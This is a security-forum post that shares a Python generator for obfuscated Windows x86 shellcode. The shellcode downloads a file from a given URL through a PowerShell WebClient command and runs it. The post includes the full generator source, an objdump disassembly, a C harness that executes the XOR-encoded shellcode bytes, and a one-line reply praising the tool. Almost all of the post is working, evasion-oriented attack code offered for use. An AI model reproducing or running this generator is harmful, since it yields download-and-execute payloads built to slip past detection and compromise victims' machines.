geeko Posted April 8, 2015 Report Share Posted April 8, 2015 #Title: Obfuscated Shellcode Windows x86/x64 Download And Execute [Use PowerShell] - Generator#length: Dynamic ! depend on url and filename#Date: 20 January 2015#Author: Ali Razmjoo#tested On: Windows 7 x64 ultimate#WinExec => 0x77b1e695#ExitProcess => 0x77ae2acf#====================================#Execute :#powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe', 'D:\Ali.exe')};D:\Ali.exe"#====================================#Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com']#Thanks to my friends , Dariush Nasirpour and Ehsan Nezami#####################################################How it work ?'''C:\Users\Ali\Desktop>python "Windows x86 Download And Execute.py"Enter urlExample: http://z3r0d4y.com/file.exeEnter:http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exeEnter filenameExample: D:\file.exeEnter:C:\Ali.exeC:\Users\Ali\Desktop>nasm -f elf shellcode.asm -o shellcode.oC:\Users\Ali\Desktop>objdump -D shellcode.oshellcode.o: file format elf32-i386Disassembly of section .text:00000000 <.text>:0: 31 c0 xor %eax,%eax2: 50 push %eax3: 68 41 41 65 22 push $0x226541418: 58 pop %eax9: c1 e8 08 shr $0x8,%eaxc: c1 e8 08 shr $0x8,%eaxf: 50 push %eax10: b8 34 47 0b 4d mov $0x4d0b4734,%eax15: bb 5d 69 6e 35 mov $0x356e695d,%ebx1a: 31 d8 xor %ebx,%eax1c: 50 push %eax1d: b8 43 32 10 22 mov $0x22103243,%eax22: bb 79 6e 51 4e mov $0x4e516e79,%ebx27: 31 d8 xor %ebx,%eax29: 50 push %eax2a: b8 60 05 42 32 mov $0x32420560,%eax2f: bb 49 78 79 71 mov $0x71797849,%ebx34: 31 d8 xor %ebx,%eax36: 50 push %eax37: b8 0f 1c 2c 14 mov $0x142c1c0f,%eax3c: bb 6a 64 49 33 mov $0x3349646a,%ebx41: 31 d8 xor %ebx,%eax43: 50 push %eax44: b8 07 3e 0b 40 mov $0x400b3e07,%eax49: bb 46 52 62 6e mov $0x6e625246,%ebx4e: 31 d8 xor %ebx,%eax50: 50 push %eax51: b8 44 0a 78 07 mov $0x7780a44,%eax56: bb 63 49 42 5b mov $0x5b424963,%ebx5b: 31 d8 xor %ebx,%eax5d: 50 push %eax5e: b8 0f 16 4b 0d mov $0xd4b160f,%eax63: bb 6a 31 67 2d mov $0x2d67316a,%ebx68: 31 d8 xor %ebx,%eax6a: 50 push %eax6b: b8 18 62 5c 1f mov $0x1f5c6218,%eax70: bb 61 4c 39 67 mov $0x67394c61,%ebx75: 31 d8 xor %ebx,%eax77: 50 push %eax78: b8 1b 2d 1e 1f mov $0x1f1e2d1b,%eax7d: bb 6b 58 6a 6b mov $0x6b6a586b,%ebx82: 31 d8 xor %ebx,%eax84: 50 push %eax85: b8 45 40 41 66 mov $0x66414045,%eax8a: bb 3d 78 77 49 mov $0x4977783d,%ebx8f: 31 d8 xor %ebx,%eax91: 50 push %eax92: b8 02 1f 4b 45 mov $0x454b1f02,%eax97: bb 6d 6b 38 6a mov $0x6a386b6d,%ebx9c: 31 d8 xor %ebx,%eax9e: 50 push %eax9f: b8 24 3e 19 32 mov $0x32193e24,%eaxa4: bb 45 4e 6a 5a mov $0x5a6a4e45,%ebxa9: 31 d8 xor %ebx,%eaxab: 50 push %eaxac: b8 00 5e 3a 35 mov $0x353a5e00,%eaxb1: bb 6c 73 49 5b mov $0x5b49736c,%ebxb6: 31 d8 xor %ebx,%eaxb8: 50 push %eaxb9: b8 1f 37 40 24 mov $0x2440371f,%eaxbe: bb 6d 52 32 41 mov $0x4132526d,%ebxc3: 31 d8 xor %ebx,%eaxc5: 50 push %eaxc6: b8 2e 35 68 31 mov $0x3168352e,%eaxcb: bb 5a 4c 45 41 mov $0x41454c5a,%ebxd0: 31 d8 xor %ebx,%eaxd2: 50 push %eaxd3: b8 48 1e 1c 15 mov $0x151c1e48,%eaxd8: bb 67 6e 69 61 mov $0x61696e67,%ebxdd: 31 d8 xor %ebx,%eaxdf: 50 push %eaxe0: b8 26 28 0d 5d mov $0x5d0d2826,%eaxe5: bb 4f 45 62 33 mov $0x3362454f,%ebxea: 31 d8 xor %ebx,%eaxec: 50 push %eaxed: b8 20 57 1d 45 mov $0x451d5720,%eaxf2: bb 47 78 63 36 mov $0x36637847,%ebxf7: 31 d8 xor %ebx,%eaxf9: 50 push %eaxfa: b8 04 6a 24 3b mov $0x3b246a04,%eaxff: bb 77 44 4b 49 mov $0x494b4477,%ebx104: 31 d8 xor %ebx,%eax106: 50 push %eax107: b8 18 0f 0a 32 mov $0x320a0f18,%eax10c: bb 6c 6e 78 47 mov $0x47786e6c,%ebx111: 31 d8 xor %ebx,%eax113: 50 push %eax114: b8 7d 18 3c 27 mov $0x273c187d,%eax119: bb 52 6c 5d 55 mov $0x555d6c52,%ebx11e: 31 d8 xor %ebx,%eax120: 50 push %eax121: b8 03 44 60 60 mov $0x60604403,%eax126: bb 77 34 5a 4f mov $0x4f5a3477,%ebx12b: 31 d8 xor %ebx,%eax12d: 50 push %eax12e: b8 47 6b 1f 20 mov $0x201f6b47,%eax133: bb 6f 4c 77 54 mov $0x54774c6f,%ebx138: 31 d8 xor %ebx,%eax13a: 50 push %eax13b: b8 2a 5e 2b 20 mov $0x202b5e2a,%eax140: bb 6c 37 47 45 mov $0x4547376c,%ebx145: 31 d8 xor %ebx,%eax147: 50 push %eax148: b8 59 07 12 0e mov $0xe120759,%eax14d: bb 35 68 73 6a mov $0x6a736835,%ebx152: 31 d8 xor %ebx,%eax154: 50 push %eax155: b8 01 59 11 2c mov $0x2c115901,%eax15a: bb 45 36 66 42 mov $0x42663645,%ebx15f: 31 d8 xor %ebx,%eax161: 50 push %eax162: b8 22 22 4e 5a mov $0x5a4e2222,%eax167: bb 4c 56 67 74 mov $0x7467564c,%ebx16c: 31 d8 xor %ebx,%eax16e: 50 push %eax16f: b8 00 37 1b 48 mov $0x481b3700,%eax174: bb 43 5b 72 2d mov $0x2d725b43,%ebx179: 31 d8 xor %ebx,%eax17b: 50 push %eax17c: b8 4a 1f 22 13 mov $0x13221f4a,%eax181: bb 64 48 47 71 mov $0x71474864,%ebx186: 31 d8 xor %ebx,%eax188: 50 push %eax189: b8 6a 23 03 18 mov $0x1803236a,%eax18e: bb 4a 6d 66 6c mov $0x6c666d4a,%ebx193: 31 d8 xor %ebx,%eax195: 50 push %eax196: b8 2d 54 57 1c mov $0x1c57542d,%eax19b: bb 47 31 34 68 mov $0x68343147,%ebx1a0: 31 d8 xor %ebx,%eax1a2: 50 push %eax1a3: b8 4e 15 36 5a mov $0x5a36154e,%eax1a8: bb 39 38 79 38 mov $0x38793839,%ebx1ad: 31 d8 xor %ebx,%eax1af: 50 push %eax1b0: b8 59 7f 1f 04 mov $0x41f7f59,%eax1b5: bb 79 57 51 61 mov $0x61515779,%ebx1ba: 31 d8 xor %ebx,%eax1bc: 50 push %eax1bd: b8 47 56 1d 2f mov $0x2f1d5647,%eax1c2: bb 65 70 3d 54 mov $0x543d7065,%ebx1c7: 31 d8 xor %ebx,%eax1c9: 50 push %eax1ca: b8 2c 18 08 54 mov $0x5408182c,%eax1cf: bb 4d 76 6c 74 mov $0x746c764d,%ebx1d4: 31 d8 xor %ebx,%eax1d6: 50 push %eax1d7: b8 5a 34 58 1b mov $0x1b58345a,%eax1dc: bb 39 5b 35 76 mov $0x76355b39,%ebx1e1: 31 d8 xor %ebx,%eax1e3: 50 push %eax1e4: b8 3f 0f 4b 41 mov $0x414b0f3f,%eax1e9: bb 53 63 6b 6c mov $0x6c6b6353,%ebx1ee: 31 d8 xor %ebx,%eax1f0: 50 push %eax1f1: b8 4a 1e 59 0b mov $0xb591e4a,%eax1f6: bb 38 6d 31 6e mov $0x6e316d38,%ebx1fb: 31 d8 xor %ebx,%eax1fd: 50 push %eax1fe: b8 49 2b 16 2a mov $0x2a162b49,%eax203: bb 39 44 61 4f mov $0x4f614439,%ebx208: 31 d8 xor %ebx,%eax20a: 50 push %eax20b: 89 e0 mov %esp,%eax20d: bb 41 41 41 01 mov $0x1414141,%ebx212: c1 eb 08 shr $0x8,%ebx215: c1 eb 08 shr $0x8,%ebx218: c1 eb 08 shr $0x8,%ebx21b: 53 push %ebx21c: 50 push %eax21d: bb 95 e6 b1 77 mov $0x77b1e695,%ebx222: ff d3 call *%ebx224: bb cf 2a ae 77 mov $0x77ae2acf,%ebx229: ff d3 call *%ebxC:\Users\Ali\Desktop>#you have your shellcode now=======================================shellcode.c#include <stdio.h>#include <string.h>int main(){unsigned char shellcode[]= "\x31\xc0\x50\x68\x41\x41\x65\x22\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb8\x34\x47\x0b?\x4d\xbb\x5d\x69\x6e\x35\x31\xd8\x50\xb8\x43\x32\x10\x22\xbb\x79\x6e\x51\x4e\x31?\xd8\x50\xb8\x60\x05\x42\x32\xbb\x49\x78\x79\x71\x31\xd8\x50\xb8\x0f\x1c\x2c\x14?\xbb\x6a\x64\x49\x33\x31\xd8\x50\xb8\x07\x3e\x0b\x40\xbb\x46\x52\x62\x6e\x31\xd8?\x50\xb8\x44\x0a\x78\x07\xbb\x63\x49\x42\x5b\x31\xd8\x50\xb8\x0f\x16\x4b\x0d\xbb?\x6a\x31\x67\x2d\x31\xd8\x50\xb8\x18\x62\x5c\x1f\xbb\x61\x4c\x39\x67\x31\xd8\x50?\xb8\x1b\x2d\x1e\x1f\xbb\x6b\x58\x6a\x6b\x31\xd8\x50\xb8\x45\x40\x41\x66\xbb\x3d?\x78\x77\x49\x31\xd8\x50\xb8\x02\x1f\x4b\x45\xbb\x6d\x6b\x38\x6a\x31\xd8\x50\xb8?\x24\x3e\x19\x32\xbb\x45\x4e\x6a\x5a\x31\xd8\x50\xb8\x00\x5e\x3a\x35\xbb\x6c\x73?\x49\x5b\x31\xd8\x50\xb8\x1f\x37\x40\x24\xbb\x6d\x52\x32\x41\x31\xd8\x50\xb8\x2e?\x35\x68\x31\xbb\x5a\x4c\x45\x41\x31\xd8\x50\xb8\x48\x1e\x1c\x15\xbb\x67\x6e\x69?\x61\x31\xd8\x50\xb8\x26\x28\x0d\x5d\xbb\x4f\x45\x62\x33\x31\xd8\x50\xb8\x20\x57?\x1d\x45\xbb\x47\x78\x63\x36\x31\xd8\x50\xb8\x04\x6a\x24\x3b\xbb\x77\x44\x4b\x49?\x31\xd8\x50\xb8\x18\x0f\x0a\x32\xbb\x6c\x6e\x78\x47\x31\xd8\x50\xb8\x7d\x18\x3c?\x27\xbb\x52\x6c\x5d\x55\x31\xd8\x50\xb8\x03\x44\x60\x60\xbb\x77\x34\x5a\x4f\x31?\xd8\x50\xb8\x47\x6b\x1f\x20\xbb\x6f\x4c\x77\x54\x31\xd8\x50\xb8\x2a\x5e\x2b\x20?\xbb\x6c\x37\x47\x45\x31\xd8\x50\xb8\x59\x07\x12\x0e\xbb\x35\x68\x73\x6a\x31\xd8?\x50\xb8\x01\x59\x11\x2c\xbb\x45\x36\x66\x42\x31\xd8\x50\xb8\x22\x22\x4e\x5a\xbb?\x4c\x56\x67\x74\x31\xd8\x50\xb8\x00\x37\x1b\x48\xbb\x43\x5b\x72\x2d\x31\xd8\x50?\xb8\x4a\x1f\x22\x13\xbb\x64\x48\x47\x71\x31\xd8\x50\xb8\x6a\x23\x03\x18\xbb\x4a?\x6d\x66\x6c\x31\xd8\x50\xb8\x2d\x54\x57\x1c\xbb\x47\x31\x34\x68\x31\xd8\x50\xb8?\x4e\x15\x36\x5a\xbb\x39\x38\x79\x38\x31\xd8\x50\xb8\x59\x7f\x1f\x04\xbb\x79\x57?\x51\x61\x31\xd8\x50\xb8\x47\x56\x1d\x2f\xbb\x65\x70\x3d\x54\x31\xd8\x50\xb8\x2c?\x18\x08\x54\xbb\x4d\x76\x6c\x74\x31\xd8\x50\xb8\x5a\x34\x58\x1b\xbb\x39\x5b\x35?\x76\x31\xd8\x50\xb8\x3f\x0f\x4b\x41\xbb\x53\x63\x6b\x6c\x31\xd8\x50\xb8\x4a\x1e?\x59\x0b\xbb\x38\x6d\x31\x6e\x31\xd8\x50\xb8\x49\x2b\x16\x2a\xbb\x39\x44\x61\x4f?\x31\xd8\x50\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53?\x50\xbb\x95\xe6\xb1\x77\xff\xd3\xbb\xcf\x2a\xae\x77\xff\xd3";fprintf(stdout,"Length: %d\n\n",strlen(shellcode));(*(void(*)()) shellcode)();}=======================================C:\Users\Ali\Desktop>gcc shellcode.c -o shellcode.exeC:\Users\Ali\Desktop>shellcode.exeLength: 173C:\Users\Ali\Desktop>#notice : when program exit, you must wait 2-3 second , it will finish download and execute file after 2-3 second'''import random,binasciichars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz123456789=[]-'p1 = '''xor eax,eaxpush eax'''p2 = '''mov eax,espmov ebx,0x01414141shr ebx,0x08shr ebx,0x08shr ebx,0x08push ebxpush eaxmov ebx,0x77b1e695call ebxmov ebx,0x77ae2acfcall ebx'''sen1 = str(raw_input('Enter url\nExample: http://z3r0d4y.com/file.exe \nEnter:'))sen1 = sen1.rsplit()sen1 = sen1[0]sen2 = str(raw_input('Enter filename\nExample: D:\\file.exe\nEnter:'))sen2 = sen2.rsplit()sen2 = sen2[0]sen = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s')};%s"''' %(sen1,sen2,sen2)m = 0for word in sen:m += 1m = m - 1stack = ''while(m>=0):stack += sen[m]m -= 1stack = stack.encode('hex')skip = 1if len(stack) % 8 == 0:skip = 0if skip is 1:stack = '00' + stackif len(stack) % 8 == 0:skip = 0if skip is 1:stack = '00' + stackif len(stack) % 8 == 0:skip = 0if skip is 1:stack = '00' + stackif len(stack) % 8 == 0:skip = 0if len(stack) % 8 == 0:zxzxzxz = 0m = len(stack) / 8c = 0n = 0z = 8shf = open('shellcode.asm','w')shf.write(p1)shf.close()shf = open('shellcode.asm','a')while(c<m):v = 'push 0x' + stack[n:z]skip = 0if '0x000000' in v:skip = 1q1 = v[13:]v = 'push 0x' + q1 + '414141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\nshr eax,0x08\npush eax\n'if '0x0000' in v:skip = 1q1 = v[11:]v = 'push 0x' + q1 + '4141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\npush eax\n'if '0x00' in v:skip = 1q1 = v[9:]v = 'push 0x' + q1 + '41' + '\n' + 'pop eax\nshr eax,0x08\npush eax\n'if skip is 1:shf.write(v)if skip is 0:v = v.rsplit()zzz = ''for w in v:if '0x' in w:zzz = str(w)s1 = binascii.b2a_hex(''.join(random.choice(chars) for i in range(4)))s1 = '0x%s'%s1data = "%x" % (int(zzz, 16) ^ int(s1, 16))v = 'mov eax,0x%s\nmov ebx,%s\nxor eax,ebx\npush eax\n'%(data,s1)shf.write(v)n += 8z += 8c += 1shf.write(p2)shf.close() Quote Link to comment Share on other sites More sharing options...
fisher5 Posted October 13, 2015 Report Share Posted October 13, 2015 cool tools Quote Link to comment Share on other sites More sharing options...